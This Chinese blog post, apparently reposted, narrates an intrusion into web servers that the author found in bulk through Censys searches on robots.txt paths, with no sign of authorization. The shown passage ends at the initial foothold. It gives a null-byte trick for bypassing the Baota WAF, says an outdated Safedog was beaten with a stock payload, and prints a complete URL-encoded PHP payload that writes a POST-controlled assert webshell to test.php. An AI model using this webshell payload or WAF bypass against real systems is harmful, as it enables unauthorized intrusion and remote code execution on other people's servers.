记一次Windows渗透提权历程

记一次Windows渗透提权历程

故事要从一次屁眼交易讲起,久经沙场的隔壁老王。。。咳咳不好意思念错稿了

最近上手代码审计菜得怀疑人生,因此想回到安逸区利用已知漏洞做下渗透找回自信= =

物色目标

很多站点出于安全考虑,都会在robots.txt文件中屏蔽掉搜索引擎对敏感路径页面的爬取。robots文件里的敏感路径在针对一个目标渗透时可以帮助我们识别出重要页面,但它的存在不利于自动化工具的批量采集,所以Censys、Shodan、Zoomeye的香味就显得愈发浓郁

记一次Windows渗透提权历程

首先在Censys中利用敏感路经找到了一堆服务器,挑了几个看起来顺眼的利用某代码执行漏洞写入WebShell

记一次Windows渗透提权历程

前几个站基本没遇到啥阻碍,遇到的宝塔WAF用file_put_con%00tents这种就可以绕过,有安全狗的也都是很久没更新过的免费版,随便找了个库存里的就过了:

file_put_contents(%27test.php%27,%27%3C?php%20function%20a(){%20return%20%22assert%22;%20}%20$a=a();%20$aa%20=%20array($_POST[%221%22]);%20call_user_func_array($a,$a=$aa);%20?%3E%27);

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/zgfddy.html